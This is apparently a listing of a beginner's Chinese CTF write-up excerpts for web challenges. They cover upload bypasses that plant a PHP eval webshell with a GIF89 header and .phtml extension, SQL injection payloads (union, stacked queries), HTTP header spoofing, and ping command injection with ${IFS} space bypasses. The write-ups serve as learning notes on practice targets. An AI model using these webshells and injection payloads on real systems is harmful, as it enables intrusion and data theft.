半枫

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看见一个文件上传路径，推测为文件上传漏洞，上传一个测试文件，看看有什么限制上传文件需要满足为jpg、png、gif结尾的图片，我们选择jpg结尾，并加上GIF89文件头绕开文件头检测， 12GIF89<script language='php'>@eval($ POST['cmd']);</script> 上传成功，但我们需要的是php可执行文件，但直接burp抓包修改为php后缀会被检查过滤，绕过php后缀的文件格式有php3,php4,php5,phtml,pht进过尝试发现phtml后缀可以，在响应美化界面中找到文件存储路径，查看上传文件，上传木马文件成功，打开蚁剑连接，在根目录下找找获得flag

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到一个很明显的提示，题目已经把后门函数给我们了，打开蚁剑连接，连接成功，尝试在根目录下找到flag文件，获得flag

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到一个文件上传入口，结合题目可以知道这是一个文件上传漏洞首先想到的是木马上传，创建一个php文件，写上一句话木马并上传一句话木马的基本写法 12341.<?php @eval($_POST['cmd']);?>2.<?=@eval($_POST['cmd']);?>3.<script language="php">eval($_REQUEST[cmd])</script> 返回结果反应上传文件为图片文件才行，使用Burp抓包修改数据包进行绕过将Content-Type修改为image/jpeg返回结果反应不能是php文件，修改后缀名.txt(试试其他后缀名也可以，不被过滤就行)<?被过滤，换另一个木马格式回显还是说不能上传，说明他可能坚持文件头，我们可以用文件头欺骗绕过一下，在文件最开始加上GIF89回显上传成功，现在我们需要找到木马文件（test.php）的位置一般猜测在uploa...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 前端检查打开靶机，F12查看前端源码，发现Secret.php文件，访问看看 Referer字段你不来自’https://Sycsecret.buuoj.cn‘显示请求头不对，使用Burp抓包修改请求头，找到Get请求Secret.php历史记录发送到RepeaterHTTP Referer（或 Referrer） 是 HTTP 请求头的一个字段，用于表示当前请求是从哪个网页链接过来的。它的主要作用是告诉服务器用户浏览器的来源页面，通常用于统计分析、防盗链、日志记录等场景。通过添加请求头来告诉服务器访问来源 1Referer:https://Sycsecret.buuoj.cn User-Agent字段User-Agent 是 HTTP 请求头中的一个重要字段，用于标识发起请求的客户端（如浏览器、爬虫、应用程序等）的软件类型、版本、操作系统等信息。服务器可以根据该字段返回适配的内容，或用于统计分析、访问控制等场景。 示例1Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，发现一个查询入口，查询不同的数字返回不同的字符串 判断是否为字符型注入11' 判断为字符型注入 确定字段数11' order by 3;# 11' order by 2;# 确定字段数为2 爆数据库11' union select database(),version();# 发现联合查询被过滤 改用堆叠注入 11';show databases;# 爆表11';show tables;# 爆列两个表都爆一下；words表: 11';show columns from words;# 1919810931114514 表： 11';show columns from `1919810931114514`;# //数字表名需要用反引号括起来 可以看到words表有id data两个字段，1919810931114514表有最想要的flag字段 爆flag返回到第一个网页（就是打开靶机进入的第一个网页）我们输入p...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，没有明显提示信息，F12看看源码发现隐藏文件Achieve.php，访问一下点击SECRET，查找源码没有发现有用信息，返回上一个页面查看源码，又发现一个隐藏文件action.php，访问一下还是返回这个页面 试试Burpsuit抓包看看有没有其他信息隐藏在action.php这个请求页面有发现一个隐藏文件secre3t.php访问看到一段源码 1234567891011<?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!";...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，看到熟悉的登录页面，尝试1,1’看看是什么类型的sql注入回显sql语句报错，判断为字符型注入 使用堆叠注入发现某些字段或’;’被过滤无法进行堆叠注入，更改思路，爆字段数更改为1’ order by 4#判断字段段数为3，即列数只有三列推测注入点为字段2和字段3 使用联合查询爆数据库payload: 11' union select 1,database(),3 # 数据库名为’geek’ 爆表名，payload: 11' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='geek'# 结合题目LoveSQL,优先选l0ve1ysq1进行爆破 11' union select 1,database(),group_concat(column_name) from information_schem...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 打开靶机，联系题目EasySql推测为sql注入点，尝试输入字符串，数字，发现数字输入有回显，推测为数字注入回显为数组输出，判断为PHP执行SQL查询后获取的结果 尝试堆叠注入， 11;show databases;# //查询所有数据库 继续查询 11;show tables;# //列出当前数据库中的所有表,类似文件系统中的“列出所有文件”） 看到名为Flag的表名 11;select * from Flag //从 Flag 表中选取所有数据,* 表示“所有字段” 发现被过滤了 推测其sql语句为： 1select <post输入框内容> from Flag; 尝试输入*号构成：select * from Flag;发现没有任何回显，猜测查询是使用的sql语句是或(||)回显 1select <post输入框内容> || flag from Flag; Mysql中的|| ||运算符相当于or，即 : 1 || 0 =10 ...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 进入靶机，提示用GET传参传入参数ip 传入/?ip=127.0.0.1试试结合题目Ping ping ping，推出是道exec”ping”题 结合系统命令ls试试看到index.php和flag.php文件 cat flag.php试试发现空格被过滤，命令绕过空格： 123${IFS}$IFS$9%09 发现’flag’字符被过滤，是怎么被过滤的？看看源码文件index.php能不能查看，分析一下这段代码 12345678910111213141516171819<?ip=|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]...

本文为记录个人信安小白的刷题路程，大佬勿喷，也同时希望文章能对您有所帮助 下列知识点解释源自pikachu靶场（很好的web入门靶场） RCE漏洞RCE(remote command/code execute)概述RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。 远程系统命令执行一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。 而，如果，设计者在完成该功能时，没有做严格的安全控制，则可能会导致攻击者通过该接口提交“意想不到”的命令，从而让后台进行执行，从而控制整个后台服务器。 远程代码执行同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。因此，如果需要给前端用户提供操作类的API接口，一...